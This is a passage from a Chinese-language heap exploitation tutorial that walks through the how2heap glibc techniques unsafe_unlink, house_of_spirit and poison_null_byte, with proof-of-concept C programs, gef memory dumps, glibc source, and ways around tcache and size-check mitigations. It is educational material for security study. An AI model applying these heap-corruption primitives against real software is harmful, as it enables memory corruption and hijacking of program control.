可以看到,我们在 chunk0 里构造一个 fake chunk,用 P 表示,两个指针 fd 和 bk 可以构成两条链:P->fd->bk == P
,P->bk->fd == P
,可以绕过检查。另外利用 chunk0 的溢出漏洞,通过修改 chunk 1 的 prev_size
为 fake chunk 的大小,修改 PREV_INUSE
标志位为 0,将 fake chunk 伪造成一个 free chunk。
接下来就是释放掉 chunk1,这会触发 fake chunk 的 unlink 并覆盖 chunk0_ptr
的值。unlink 操作是这样进行的:
FD = P->fd;
BK = P->bk;
FD->bk = BK
BK->fd = FD
根据 fd 和 bk 指针在 malloc_chunk 结构体中的位置,这段代码等价于:
FD = P->fd = &P - 24
BK = P->bk = &P - 16
FD->bk = *(&P - 24 + 24) = P
FD->fd = *(&P - 16 + 16) = P
这样就通过了 unlink 的检查,最终效果为:
FD->bk = P = BK = &P - 16
BK->fd = P = FD = &P - 24
原本指向堆上 fake chunk 的指针 P 指向了自身地址减 24 的位置,这就意味着如果程序功能允许堆 P 进行写入,就能改写 P 指针自身的地址,从而造成任意内存写入。若允许堆 P 进行读取,则会造成信息泄漏。
在这个例子中,由于 P->fd->bk 和 P->bk->fd 都指向 P,所以最后的结果为:
chunk0_ptr = P = P->fd
成功地修改了 chunk0_ptr,这时 chunk0_ptr
和 chunk0_ptr[3]
实际上就是同一东西。这里可能会有疑惑为什么这两个东西是一样的,因为 chunk0_ptr
指针在是放在数据段上的,地址在 0x601070
,指向 0x601058
,而 chunk0_ptr[3]
的意思是从 chunk0_ptr
指向的地方开始数 3 个单位,所以 0x601058+0x08*3=0x601070
:
gef➤ x/40gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 0
0x602010: 0x0000000000000000 0x0000000000020ff1 <-- fake chunk P
0x602020: 0x0000000000601058 0x0000000000601060 <-- fd, bk pointer
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000000
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000080 0x0000000000000090 <-- chunk 1 [be freed]
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000000000
0x6020c0: 0x0000000000000000 0x0000000000000000
0x6020d0: 0x0000000000000000 0x0000000000000000
0x6020e0: 0x0000000000000000 0x0000000000000000
0x6020f0: 0x0000000000000000 0x0000000000000000
0x602100: 0x0000000000000000 0x0000000000000000
0x602110: 0x0000000000000000 0x0000000000000000
0x602120: 0x0000000000000000 0x0000000000020ee1 <-- top chunk
0x602130: 0x0000000000000000 0x0000000000000000
gef➤ x/5gx 0x601058
0x601058: 0x0000000000000000 0x00007ffff7dd2540 <-- fake chunk FD
0x601068: 0x0000000000000000 0x0000000000601058 <-- bk pointer
0x601078: 0x0000000000000000
gef➤ x/5gx 0x601060
0x601060: 0x00007ffff7dd2540 0x0000000000000000 <-- fake chunk BK
0x601070: 0x0000000000601058 0x0000000000000000 <-- fd pointer
0x601080: 0x0000000000000000
gef➤ x/gx chunk0_ptr
0x601058: 0x0000000000000000
gef➤ x/gx chunk0_ptr[3]
0x601058: 0x0000000000000000
所以,修改 chunk0_ptr[3]
就等于修改 chunk0_ptr
:
gef➤ x/5gx 0x601058
0x601058: 0x0000000000000000 0x00007ffff7dd2540
0x601068: 0x0000000000000000 0x00007fffffffdc70 <-- chunk0_ptr[3]
0x601078: 0x0000000000000000
gef➤ x/gx chunk0_ptr
0x7fffffffdc70: 0x4141414141414141
这时 chunk0_ptr
就指向了 victim_string,修改它:
gef➤ x/gx chunk0_ptr
0x7fffffffdc70: 0x4242424242424242
成功达成修改任意地址的成就。
最后看一点新的东西,libc-2.25 在 unlink 的开头增加了对 chunk_size == next->prev->chunk_size
的检查,以对抗单字节溢出的问题。补丁如下:
$ git show 17f487b7afa7cd6c316040f3e6c86dc96b2eec30 malloc/malloc.c
commit 17f487b7afa7cd6c316040f3e6c86dc96b2eec30
Author: DJ Delorie <dj@delorie.com>
Date: Fri Mar 17 15:31:38 2017 -0400
Further harden glibc malloc metadata against 1-byte overflows.
Additional check for chunk_size == next->prev->chunk_size in unlink()
2017-03-17 Chris Evans <scarybeasts@gmail.com>
* malloc/malloc.c (unlink): Add consistency check between size and
next->prev->size, to further harden against 1-byte overflows.
diff --git a/malloc/malloc.c b/malloc/malloc.c
index e29105c372..994a23248e 100644
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -1376,6 +1376,8 @@ typedef struct malloc_chunk *mbinptr;
/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) { \
+ if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \
+ malloc_printerr (check_action, "corrupted size vs. prev_size", P, AV); \
FD = P->fd; \
BK = P->bk; \
if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \
具体是这样的:
/* Ptr to next physical malloc_chunk. */
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
/* Like chunksize, but do not mask SIZE_BITS. */
#define chunksize_nomask(p) ((p)->mchunk_size)
/* Size of the chunk below P. Only valid if prev_inuse (P). */
#define prev_size(p) ((p)->mchunk_prev_size)
/* Bits to mask off when extracting size */
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
回顾一下伪造出来的堆:
gef➤ x/40gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 <-- chunk 0
0x602010: 0x0000000000000000 0x0000000000000000 <-- fake chunk P
0x602020: 0x0000000000601058 0x0000000000601060 <-- fd, bk pointer
0x602030: 0x0000000000000000 0x0000000000000000
0x602040: 0x0000000000000000 0x0000000000000000
0x602050: 0x0000000000000000 0x0000000000000000
0x602060: 0x0000000000000000 0x0000000000000000
0x602070: 0x0000000000000000 0x0000000000000000
0x602080: 0x0000000000000000 0x0000000000000000
0x602090: 0x0000000000000080 0x0000000000000090 <-- chunk 1 <-- prev_size
0x6020a0: 0x0000000000000000 0x0000000000000000
0x6020b0: 0x0000000000000000 0x0000000000000000
0x6020c0: 0x0000000000000000 0x0000000000000000
0x6020d0: 0x0000000000000000 0x0000000000000000
0x6020e0: 0x0000000000000000 0x0000000000000000
0x6020f0: 0x0000000000000000 0x0000000000000000
0x602100: 0x0000000000000000 0x0000000000000000
0x602110: 0x0000000000000000 0x0000000000000000
0x602120: 0x0000000000000000 0x0000000000020ee1 <-- top chunk
0x602130: 0x0000000000000000 0x0000000000000000
这里有三种办法可以绕过该检查:
-
什么都不做。
chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x0
prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x0) == 0x0
-
设置
chunk0_ptr[1] = 0x8
。
chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x8
prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x8) == 0x8
-
设置
chunk0_ptr[1] = 0x80
。
chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x80
prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x80) == 0x80
好的,现在 libc-2.25 版本下我们也能成功利用了。接下来更近一步,libc-2.26 怎么利用,首先当然要先知道它新增了哪些漏洞缓解措施,其中一个神奇的东西叫做 tcache,这是一种线程缓存机制,每个线程默认情况下有 64 个大小递增的 bins,每个 bin 是一个单链表,默认最多包含 7 个 chunk。其中缓存的 chunk 是不会被合并的,所以在释放 chunk 1 的时候,chunk0_ptr
仍然指向正确的堆地址,而不是之前的 chunk0_ptr = P = P->fd
。为了解决这个问题,一种可能的办法是给填充进特定大小的 chunk 把 bin 占满,就像下面这样:
// deal with tcache
int *a[10];
int i;
for (i = 0; i < 7; i++) {
a[i] = malloc(0x80);
}
for (i = 0; i < 7; i++) {
free(a[i]);
}
gef➤ p &chunk0_ptr
$2 = (uint64_t **) 0x555555755070 <chunk0_ptr>
gef➤ x/gx 0x555555755070
0x555555755070 <chunk0_ptr>: 0x00007fffffffdd0f
gef➤ x/gx 0x00007fffffffdd0f
0x7fffffffdd0f: 0x4242424242424242
现在 libc-2.26 版本下也成功利用了。tcache 是个很有趣的东西,更详细的内容我们会在专门的章节里去讲。
加上内存检测参数重新编译,可以看到 heap-buffer-overflow:
$ gcc -fsanitize=address -g unsafe_unlink.c
$ ./a.out
The global chunk0_ptr is at 0x602230, pointing to 0x60c00000bf80
The victim chunk we are going to corrupt is at 0x60c00000bec0
Fake chunk fd: 0x602218
Fake chunk bk: 0x602220
=================================================================
==5591==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000beb0 at pc 0x000000400d74 bp 0x7ffd06423730 sp 0x7ffd06423720
WRITE of size 8 at 0x60c00000beb0 thread T0
#0 0x400d73 in main /home/firmy/how2heap/unsafe_unlink.c:26
#1 0x7fc925d8282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#2 0x400968 in _start (/home/firmy/how2heap/a.out+0x400968)
0x60c00000beb0 is located 16 bytes to the left of 128-byte region [0x60c00000bec0,0x60c00000bf40)
allocated by thread T0 here:
#0 0x7fc9261c4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x400b12 in main /home/firmy/how2heap/unsafe_unlink.c:13
#2 0x7fc925d8282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
house_of_spirit
#include <stdio.h>
#include <stdlib.h>
int main() {
malloc(1);
fprintf(stderr, "We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.\n");
unsigned long long *a, *b;
unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));
fprintf(stderr, "The first one: %p\n", &fake_chunks[0]);
fprintf(stderr, "The second one: %p\n", &fake_chunks[4]);
fake_chunks[1] = 0x20; // the size
fake_chunks[5] = 0x1234; // nextsize
fake_chunks[2] = 0x4141414141414141LL;
fake_chunks[6] = 0x4141414141414141LL;
fprintf(stderr, "Overwritting our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[0]);
a = &fake_chunks[2];
fprintf(stderr, "Freeing the overwritten pointer.\n");
free(a);
fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[0], &fake_chunks[2]);
b = malloc(0x10);
fprintf(stderr, "malloc(0x10): %p\n", b);
b[0] = 0x4242424242424242LL;
}
$ gcc -g house_of_spirit.c
$ ./a.out
We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.
The first one: 0x7ffc782dae00
The second one: 0x7ffc782dae20
Overwritting our pointer with the address of the fake region inside the fake first chunk, 0x7ffc782dae00.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7ffc782dae00, which will be 0x7ffc782dae10!
malloc(0x10): 0x7ffc782dae10
house-of-spirit 是一种 fastbins 攻击方法,通过构造 fake chunk,然后将其 free 掉,就可以在下一次 malloc 时返回 fake chunk 的地址,即任意我们可控的区域。house-of-spirit 是一种通过堆的 fast bin 机制来辅助栈溢出的方法,一般的栈溢出漏洞的利用都希望能够覆盖函数的返回地址以控制 EIP 来劫持控制流,但如果栈溢出的长度无法覆盖返回地址,同时却可以覆盖栈上的一个即将被 free 的堆指针,此时可以将这个指针改写为栈上的地址并在相应位置构造一个 fast bin 块的元数据,接着在 free 操作时,这个栈上的堆块被放到 fast bin 中,下一次 malloc 对应的大小时,由于 fast bin 的先进后出机制,这个栈上的堆块被返回给用户,再次写入时就可能造成返回地址的改写。所以利用的第一步不是去控制一个 chunk,而是控制传给 free 函数的指针,将其指向一个 fake chunk。所以 fake chunk 的伪造是关键。
首先 malloc(1) 用于初始化内存环境,然后在 fake chunk 区域伪造出两个 chunk。另外正如上面所说的,需要一个传递给 free 函数的可以被修改的指针,无论是通过栈溢出还是其它什么方式:
gef➤ x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000 0x0000000000000020 <-- fake chunk 1
0x7fffffffdcc0: 0x4141414141414141 0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001 0x0000000000001234 <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141 0x0000000000000000
gef➤ x/gx &a
0x7fffffffdca0: 0x0000000000000000
伪造 chunk 时需要绕过一些检查,首先是标志位,PREV_INUSE
位并不影响 free 的过程,但 IS_MMAPPED
位和 NON_MAIN_ARENA
位都要为零。其次,在 64 位系统中 fast chunk 的大小要在 32~128 字节之间。最后,是 next chunk 的大小,必须大于 2*SIZE_SZ
(即大于16),小于 av->system_mem
(即小于128kb),才能绕过对 next chunk 大小的检查。
libc-2.23 中这些检查代码如下:
void
__libc_free (void *mem)
{
mstate ar_ptr;
mchunkptr p; /* chunk corresponding to mem */
[...]
p = mem2chunk (mem);
if (chunk_is_mmapped (p)) /* release mmapped memory. */
{
[...]
munmap_chunk (p);
return;
}
ar_ptr = arena_for_chunk (p); // 获得 chunk 所属 arena 的地址
_int_free (ar_ptr, p, 0); // 当 IS_MMAPPED 为零时调用
}
mem
就是我们所控制的传递给 free 函数的地址。其中下面两个函数用于在 chunk 指针和 malloc 指针之间做转换:
/* conversion from malloc headers to user pointers, and back */
#define chunk2mem(p) ((void*)((char*)(p) + 2*SIZE_SZ))
#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
当 NON_MAIN_ARENA
为零时返回 main arena:
/* find the heap and corresponding arena for a given ptr */
#define heap_for_ptr(ptr) \
((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE - 1)))
#define arena_for_chunk(ptr) \
(chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena)
这样,程序就顺利地进入了 _int_free
函数:
static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
INTERNAL_SIZE_T size; /* its size */
mfastbinptr *fb; /* associated fastbin */
[...]
size = chunksize (p);
[...]
/*
If eligible, place chunk on a fastbin so it can be found
and used quickly in malloc.
*/
if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
#if TRIM_FASTBINS
/*
If TRIM_FASTBINS set, don't place chunks
bordering top into fastbins
*/
&& (chunk_at_offset(p, size) != av->top)
#endif
) {
if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (chunksize (chunk_at_offset (p, size))
>= av->system_mem, 0))
{
[...]
errstr = "free(): invalid next size (fast)";
goto errout;
}
[...]
set_fastchunks(av);
unsigned int idx = fastbin_index(size);
fb = &fastbin (av, idx);
/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */
mchunkptr old = *fb, old2;
[...]
do
{
[...]
p->fd = old2 = old;
}
while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);
其中下面的宏函数用于获得 next chunk:
/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s) ((mchunkptr) (((char *) (p)) + (s)))
然后修改指针 a 指向 (fake chunk 1 + 0x10) 的位置,即上面提到的 mem
。然后将其传递给 free 函数,这时程序就会误以为这是一块真的 chunk,然后将其释放并加入到 fastbin 中。
gef➤ x/gx &a
0x7fffffffdca0: 0x00007fffffffdcc0
gef➤ x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000 0x0000000000000020 <-- fake chunk 1 [be freed]
0x7fffffffdcc0: 0x0000000000000000 0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001 0x0000000000001234 <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141 0x0000000000000000
0x7fffffffdcf0: 0x0000000000400820 0x00000000004005b0
gef➤ heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10] ← Chunk(addr=0x7fffffffdcc0, size=0x20, flags=)
这时如果我们 malloc 一个对应大小的 fast chunk,程序将从 fastbins 中分配出这块被释放的 chunk。
gef➤ x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000 0x0000000000000020 <-- new chunk
0x7fffffffdcc0: 0x4242424242424242 0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001 0x0000000000001234 <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141 0x0000000000000000
0x7fffffffdcf0: 0x0000000000400820 0x00000000004005b0
gef➤ x/gx &b
0x7fffffffdca8: 0x00007fffffffdcc0
所以 house-of-spirit 的主要目的是,当我们伪造的 fake chunk 内部存在不可控区域时,运用这一技术可以将这片区域变成可控的。上面为了方便观察,在 fake chunk 里填充一些字母,但在现实中这些位置很可能是不可控的,而 house-of-spirit 也正是以此为目的而出现的。
该技术的缺点也是需要对栈地址进行泄漏,否则无法正确覆盖需要释放的堆指针,且在构造数据时,需要满足对齐的要求等。
加上内存检测参数重新编译,可以看到问题所在,即尝试 free 一块不是由 malloc 分配的 chunk:
$ gcc -fsanitize=address -g house_of_spirit.c
$ ./a.out
We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.
The first one: 0x7fffa61d6c00
The second one: 0x7fffa61d6c20
Overwritting our pointer with the address of the fake region inside the fake first chunk, 0x7fffa61d6c00.
Freeing the overwritten pointer.
=================================================================
==5282==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x7fffa61d6c10 in thread T0
#0 0x7fc4c3a332ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x400cab in main /home/firmyy/how2heap/house_of_spirit.c:24
#2 0x7fc4c35f182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#3 0x4009b8 in _start (/home/firmyy/how2heap/a.out+0x4009b8)
house-of-spirit 在 libc-2.26 下的利用可以查看章节 4.14。
3.1.7 Linux 堆利用(中)
how2heap
poison_null_byte
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
int main() {
uint8_t *a, *b, *c, *b1, *b2, *d;
a = (uint8_t*) malloc(0x10);
int real_a_size = malloc_usable_size(a);
fprintf(stderr, "We allocate 0x10 bytes for 'a': %p\n", a);
fprintf(stderr, "'real' size of 'a': %#x\n", real_a_size);
b = (uint8_t*) malloc(0x100);
c = (uint8_t*) malloc(0x80);
fprintf(stderr, "b: %p\n", b);
fprintf(stderr, "c: %p\n", c);
uint64_t* b_size_ptr = (uint64_t*)(b - 0x8);
*(size_t*)(b+0xf0) = 0x100;
fprintf(stderr, "b.size: %#lx ((0x100 + 0x10) | prev_in_use)\n\n", *b_size_ptr);
// deal with tcache
// int *k[10], i;
// for (i = 0; i < 7; i++) {
// k[i] = malloc(0x100);
// }
// for (i = 0; i < 7; i++) {
// free(k[i]);
// }
free(b);
uint64_t* c_prev_size_ptr = ((uint64_t*)c) - 2;
fprintf(stderr, "After free(b), c.prev_size: %#lx\n", *c_prev_size_ptr);
a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG"
fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n");
fprintf(stderr, "b.size: %#lx\n\n", *b_size_ptr);
fprintf(stderr, "Pass the check: chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n", *((size_t*)(b-0x8)), *(size_t*)(b-0x10 + *((size_t*)(b-0x8))));
b1 = malloc(0x80);
memset(b1, 'A', 0x80);
fprintf(stderr, "We malloc 'b1': %p\n", b1);
fprintf(stderr, "c.prev_size: %#lx\n", *c_prev_size_ptr);
fprintf(stderr, "fake c.prev_size: %#lx\n\n", *(((uint64_t*)c)-4));
b2 = malloc(0x40);
memset(b2, 'A', 0x40);
fprintf(stderr, "We malloc 'b2', our 'victim' chunk: %p\n", b2);
// deal with tcache
// for (i = 0; i < 7; i++) {
// k[i] = malloc(0x80);
// }
// for (i = 0; i < 7; i++) {
// free(k[i]);
// }
free(b1);
free(c);
fprintf(stderr, "Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");
d = malloc(0x110);
fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2': %p\n\n", d);
fprintf(stderr, "b2 content:%s\n", b2);
memset(d, 'B', 0xb0);
fprintf(stderr, "New b2 content:%s\n", b2);
}
$ gcc -g poison_null_byte.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0xabb010
'real' size of 'a': 0x18
b: 0xabb030
c: 0xabb140
b.size: 0x111 ((0x100 + 0x10) | prev_in_use)
After free(b), c.prev_size: 0x110
We overflow 'a' with a single null byte into the metadata of 'b'
b.size: 0x100
Pass the check: chunksize(P) == 0x100 == 0x100 == prev_size (next_chunk(P))
We malloc 'b1': 0xabb030
c.prev_size: 0x110
fake c.prev_size: 0x70
We malloc 'b2', our 'victim' chunk: 0xabb0c0
Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').
Finally, we allocate 'd', overlapping 'b2': 0xabb030
b2 content:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
New b2 content:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
该技术适用的场景需要某个 malloc 的内存区域存在一个单字节溢出漏洞。通过溢出下一个 chunk 的 size 字段,攻击者能够在堆中创造出重叠的内存块,从而达到改写其他数据的目的。再结合其他的利用方式,同样能够获得程序的控制权。
对于单字节溢出的利用有下面几种:
- 扩展被释放块:当溢出块的下一块为被释放块且处于 unsorted bin 中,则通过溢出一个字节来将其大小扩大,下次取得次块时就意味着其后的块将被覆盖而造成进一步的溢出
0x100 0x100 0x80
|-------|-------|-------|
| A | B | C | 初始状态
|-------|-------|-------|
| A | B | C | 释放 B
|-------|-------|-------|
| A | B | C | 溢出 B 的 size 为 0x180
|-------|-------|-------|
| A | B | C | malloc(0x180-8)
|-------|-------|-------| C 块被覆盖
|<--实际得到的块->|
- 扩展已分配块:当溢出块的下一块为使用中的块,则需要合理控制溢出的字节,使其被释放时的合并操作能够顺利进行,例如直接加上下一块的大小使其完全被覆盖。下一次分配对应大小时,即可取得已经被扩大的块,并造成进一步溢出
0x100 0x100 0x80
|-------|-------|-------|
| A | B | C | 初始状态
|-------|-------|-------|
| A | B | C | 溢出 B 的 size 为 0x180
|-------|-------|-------|
| A | B | C | 释放 B
|-------|-------|-------|
| A | B | C | malloc(0x180-8)
|-------|-------|-------| C 块被覆盖
|<--实际得到的块->|
- 收缩被释放块:此情况针对溢出的字节只能为 0 的时候,也就是本节所说的 poison-null-byte,此时将下一个被释放的块大小缩小,如此一来在之后分裂此块时将无法正确更新后一块的 prev_size 字段,导致释放时出现重叠的堆块
0x100 0x210 0x80
|-------|---------------|-------|
| A | B | C | 初始状态
|-------|---------------|-------|
| A | B | C | 释放 B
|-------|---------------|-------|
| A | B | C | 溢出 B 的 size 为 0x200
|-------|---------------|-------| 之后的 malloc 操作没有更新 C 的 prev_size
0x100 0x80
|-------|------|-----|--|-------|
| A | B1 | B2 | | C | malloc(0x180-8), malloc(0x80-8)
|-------|------|-----|--|-------|
| A | B1 | B2 | | C | 释放 B1
|-------|------|-----|--|-------|
| A | B1 | B2 | | C | 释放 C,C 将与 B1 合并
|-------|------|-----|--|-------|
| A | B1 | B2 | | C | malloc(0x180-8)
|-------|------|-----|--|-------| B2 将被覆盖
|<实际得到的块>|
- house of einherjar:也是溢出字节只能为 0 的情况,当它是更新溢出块下一块的 prev_size 字段,使其在被释放时能够找到之前一个合法的被释放块并与其合并,造成堆块重叠
0x100 0x100 0x101
|-------|-------|-------|
| A | B | C | 初始状态
|-------|-------|-------|
| A | B | C | 释放 A
|-------|-------|-------|
| A | B | C | 溢出 B,覆盖 C 块的 size 为 0x200,并使其 prev_size 为 0x200
|-------|-------|-------|
| A | B | C | 释放 C
|-------|-------|-------|
| A | B | C | C 将与 A 合并
|-------|-------|-------| B 块被重叠
|<-----实际得到的块------>|
首先分配三个 chunk,第一个 chunk 类型无所谓,但后两个不能是 fast chunk,因为 fast chunk 在释放后不会被合并。这里 chunk a 用于制造单字节溢出,去覆盖 chunk b 的第一个字节,chunk c 的作用是帮助伪造 fake chunk。
首先是溢出,那么就需要知道一个堆块实际可用的内存大小(因为空间复用,可能会比分配时要大一点),用于获得该大小的函数 malloc_usable_size
如下:
/*
------------------------- malloc_usable_size -------------------------
*/
static size_t
musable (void *mem)
{
mchunkptr p;
if (mem != 0)
{
p = mem2chunk (mem);
[...]
if (chunk_is_mmapped (p))
return chunksize (p) - 2 * SIZE_SZ;
else if (inuse (p))
return chunksize (p) - SIZE_SZ;
}
return 0;
}
/* check for mmap()'ed chunk */
#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)
/* extract p's inuse bit */
#define inuse(p) \
((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE)
/* Get size, ignoring use bits */
#define chunksize(p) ((p)->size & ~(SIZE_BITS))
所以 real_a_size = chunksize(a) - 0x8 == 0x18
。另外需要注意的是程序是通过 next chunk 的 PREV_INUSE
标志来判断某 chunk 是否被使用的。
为了在修改 chunk b 的 size 字段后,依然能通过 unlink 的检查,我们需要伪造一个 c.prev_size 字段,字段的大小是很好计算的,即 0x100 == (0x111 & 0xff00)
,正好是 NULL 字节溢出后的值。然后把 chunk b 释放掉,chunk b 随后被放到 unsorted bin 中,大小是 0x110。此时的堆布局如下:
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000000111 <-- chunk b [be freed]
0x603030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x603040: 0x0000000000000000 0x0000000000000000
0x603050: 0x0000000000000000 0x0000000000000000
0x603060: 0x0000000000000000 0x0000000000000000
0x603070: 0x0000000000000000 0x0000000000000000
0x603080: 0x0000000000000000 0x0000000000000000
0x603090: 0x0000000000000000 0x0000000000000000
0x6030a0: 0x0000000000000000 0x0000000000000000
0x6030b0: 0x0000000000000000 0x0000000000000000
0x6030c0: 0x0000000000000000 0x0000000000000000
0x6030d0: 0x0000000000000000 0x0000000000000000
0x6030e0: 0x0000000000000000 0x0000000000000000
0x6030f0: 0x0000000000000000 0x0000000000000000
0x603100: 0x0000000000000000 0x0000000000000000
0x603110: 0x0000000000000000 0x0000000000000000
0x603120: 0x0000000000000100 0x0000000000000000 <-- fake c.prev_size
0x603130: 0x0000000000000110 0x0000000000000090 <-- chunk c
0x603140: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603020, bk=0x603020
→ Chunk(addr=0x603030, size=0x110, flags=PREV_INUSE)
最关键的一步,通过溢出漏洞覆写 chunk b 的数据:
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000000100 <-- chunk b [be freed]
0x603030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x603040: 0x0000000000000000 0x0000000000000000
0x603050: 0x0000000000000000 0x0000000000000000
0x603060: 0x0000000000000000 0x0000000000000000
0x603070: 0x0000000000000000 0x0000000000000000
0x603080: 0x0000000000000000 0x0000000000000000
0x603090: 0x0000000000000000 0x0000000000000000
0x6030a0: 0x0000000000000000 0x0000000000000000
0x6030b0: 0x0000000000000000 0x0000000000000000
0x6030c0: 0x0000000000000000 0x0000000000000000
0x6030d0: 0x0000000000000000 0x0000000000000000
0x6030e0: 0x0000000000000000 0x0000000000000000
0x6030f0: 0x0000000000000000 0x0000000000000000
0x603100: 0x0000000000000000 0x0000000000000000
0x603110: 0x0000000000000000 0x0000000000000000
0x603120: 0x0000000000000100 0x0000000000000000 <-- fake c.prev_size
0x603130: 0x0000000000000110 0x0000000000000090 <-- chunk c
0x603140: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603020, bk=0x603020
→ Chunk(addr=0x603030, size=0x100, flags=)
这时,根据我们上一篇文字中讲到的计算方法:
chunksize(P) == *((size_t*)(b-0x8)) & (~ 0x7) == 0x100
prev_size (next_chunk(P)) == *(size_t*)(b-0x10 + 0x100) == 0x100
可以成功绕过检查。另外 unsorted bin 中的 chunk 大小也变成了 0x100。
接下来随意分配两个 chunk,malloc 会从 unsorted bin 中划出合适大小的内存返回给用户:
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000000091 <-- chunk b1 <-- fake chunk b
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x4141414141414141 0x4141414141414141
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000000051 <-- chunk b2 <-- 'victim' chunk
0x6030c0: 0x4141414141414141 0x4141414141414141
0x6030d0: 0x4141414141414141 0x4141414141414141
0x6030e0: 0x4141414141414141 0x4141414141414141
0x6030f0: 0x4141414141414141 0x4141414141414141
0x603100: 0x0000000000000000 0x0000000000000021 <-- unsorted bin
0x603110: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x603120: 0x0000000000000020 0x0000000000000000 <-- fake c.prev_size
